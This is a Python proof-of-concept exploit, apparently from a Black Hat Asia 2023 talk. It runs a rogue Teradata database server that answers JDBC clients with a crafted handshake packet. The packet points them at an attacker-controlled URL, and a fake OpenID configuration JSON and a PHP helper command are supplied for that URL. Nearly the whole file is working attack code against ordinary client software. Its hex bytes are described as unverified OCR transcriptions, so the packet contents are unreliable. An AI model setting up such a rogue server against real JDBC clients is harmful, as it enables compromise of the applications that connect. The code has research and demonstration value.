JDBC 攻击teradata 的 POC, 来自 blackhat ASIA 2023
import struct | |
import asyncio | |
# Address the JDBC client is expected to request.
# According to the author, the client ends up fetching:
# http://127.0.0.1:1881/.well-known/openid-configuration
# Only this base value is embedded in packet_to_send below; it is encoded
# as ASCII and its length is packed into a single byte there, so keep it
# ASCII-only and no longer than 255 bytes.
url = "http://127.0.0.1:1881/"
# Column-wise concatenation of the OCR-transcribed hex rows.
# "0x" is a placeholder inserted to keep the row groups aligned where a
# row is missing; it is dropped from the output.
def merge_strings(arr: list) -> str:
    """Concatenate the entries of *arr* column by column, skipping ``"0x"``.

    The number of columns is taken from the first row; every other row is
    expected to have at least that many entries (a shorter row raises
    ``IndexError``, as does an empty *arr*).

    Args:
        arr: A list of rows, each a list of string cells.

    Returns:
        All cells except the ``"0x"`` placeholders, joined in the order
        column 0 of every row, then column 1 of every row, and so on.
    """
    width = len(arr[0])
    columns = ([row[i] for row in arr] for i in range(width))
    kept = [cell for column in columns for cell in column if cell != "0x"]
    return "".join(kept)
# Traffic bytes transcribed via OCR.
# The intended way to obtain these would be the official documentation or a
# capture taken from a production environment; because (1) the official docs
# are hard to use and (2) the VM was only available for x86, the values were
# copied instead.
#
# Six row groups of eight hex strings each. merge_strings() reads them
# column by column (index i across every group) and drops the "0x"
# placeholders, which pad the groups that have only seven real rows.
# Being OCR output, individual digits are unverified here.
s_list = [
    [
        "0x",
        "000000002b024e000003",
        "20202020202020202020",
        "2020204e010001000154",
        "00f23000007918000000",
        "01000a001c0101010101",
        "0101000d003e31372e32",
        "28010000010001010000",
    ],
    [
        "0x",
        "e8000003e80078000177ff00000002",
        "2020202020202020f1004153434949",
        "0007008c310000640000fa00000f42",
        "260000fa000000fa000000fa000000",
        "010102010001010001010101020101",
        "302e30332e30392020202020202020",
        "010100000100010001000100000000",
    ],
    [
        "0x",
        "00000001ff000004be005554463136",
        "202020202020202020202020202020",
        "40000000007cff06000070000000ff",
        "7d0000007d000000fa000000fa0000",
        "0001010101010102000b0022010101",
        "202020202020202020202031372e32",
        "000000000000000101000100010000",
    ],
    [
        "0000000000000000000",
        "2020202020202020202",
        "2020202020202020202",
        "f80000000100000000b",
        "0009e70000000600000",
        "0101000101010101010",
        "302e30332e303920202",
        "0100100014000000000",
    ],
    [
        "000000000000000000000000100000",
        "020202020202020202020202020202",
        "0c0004542434449432020202020202",
        "f000000100000ffff0000080000000",
        "00600000006000003e8000fa00000f",
        "201010101010101000101010101010",
        "020202020202020202020202020202",
        "000000000008002000000000000000",
    ],
    [
        "00005ff0000000000000000000000",
        "0bf00555446382020202020202020",
        "02020202020202020202020202020",
        "08000000040000009e7000fa00000",
        "ffc00000fffb40000fa0000090001",
        "1010001010000000c000601000102",
        "0202020000e000403030203000f00",
        "00012002001010101010101010000",
    ],
]
# Response bytes built once at import time; handle_connection() writes this
# exact buffer to every client that connects.
# The three ">H" fields are big-endian 16-bit values derived from len(url)
# (+899, +87, +11) — presumably length fields covering the data that
# follows each of them; confirm against the protocol documentation.
packet_to_send = (
    bytes.fromhex("03020a0000070000")
    + struct.pack(">H", len(url) + 899)
    + bytes.fromhex(
        # Merged OCR rows followed by a fixed trailer.
        merge_strings(s_list)
        + "0000000000000000000000000000000000000000000000130008010101000000000000060002014900a5"
    )
    + struct.pack(">H", len(url) + 87)
    + bytes.fromhex(
        "0000000100010005010002000811140309000300040004000600210006000400050004000700040008000400090004000a000501000b000501000c000501000e0004001000060100000f"
    )
    + struct.pack(">H", len(url) + 11)
    + bytes.fromhex("000372636500")
    # One-byte length prefix: struct.error if len(url) > 255.
    + struct.pack("B", len(url))
    # UnicodeEncodeError if url contains non-ASCII characters.
    + url.encode("ascii")
    + bytes.fromhex(
        "00a70031000000010000000d2b06010401813f0187740101090010000c00000003000000010011000c000000010000001400a70024000000010000000c2b06010401813f01877401140011000c000000010000004600a7002100000001000000092a864886f7120102020011000c000000010000002800a7001e00000001000000062b06010505020011000c000000010000004100a70025000000010000000d2b0601040181e01a04822e01040011000c000000010000001e00a70025000000010000000d2b0601040181e01a04822e01030011000c000000010000000a"
    )
)
async def handle_connection(reader, writer):
    """Serve one inbound connection with the prebuilt packet.

    Writes ``packet_to_send``, waits for up to 10 bytes from the client
    (their content is discarded), writes the same packet a second time
    and closes the stream. Nothing the client sends influences the
    response.

    Args:
        reader: ``asyncio.StreamReader`` for the accepted connection.
        writer: ``asyncio.StreamWriter`` for the accepted connection.
    """
    writer.write(packet_to_send)
    await writer.drain()
    # Up to 10 bytes are read and dropped; returns b"" if the client has
    # already closed its side.
    await reader.read(10)
    writer.write(packet_to_send)
    await writer.drain()
    # NOTE(review): close() is not followed by `await writer.wait_closed()`,
    # so the transport may still be shutting down when this returns.
    writer.close()
# Must be paired with an HTTP service that returns a "success" JSON document.
# The author used result.json plus PHP's built-in server, started with:
#   php -S 0.0.0.0:1881 result.json
# NOTE(review): `url` above points at 127.0.0.1, so binding that helper to
# 0.0.0.0 exposes it on every interface for no benefit; 127.0.0.1:1881
# would suffice.
async def main():
    """Listen on "localhost" port 1025 and serve until cancelled.

    Every accepted connection is passed to ``handle_connection``.
    Port 1025 is presumably the port the JDBC client is configured to
    connect to — confirm against the client setup.
    """
    server = await asyncio.start_server(handle_connection, "localhost", 1025)
    async with server:
        # serve_forever() only returns when the task is cancelled.
        await server.serve_forever()
# Runs at import time: there is no `if __name__ == "__main__":` guard, so
# importing this module starts the listener. Blocks until interrupted.
asyncio.run(main())
{ | |
"authorization_endpoint":"a", | |
"token_endpoint":"2" | |
} |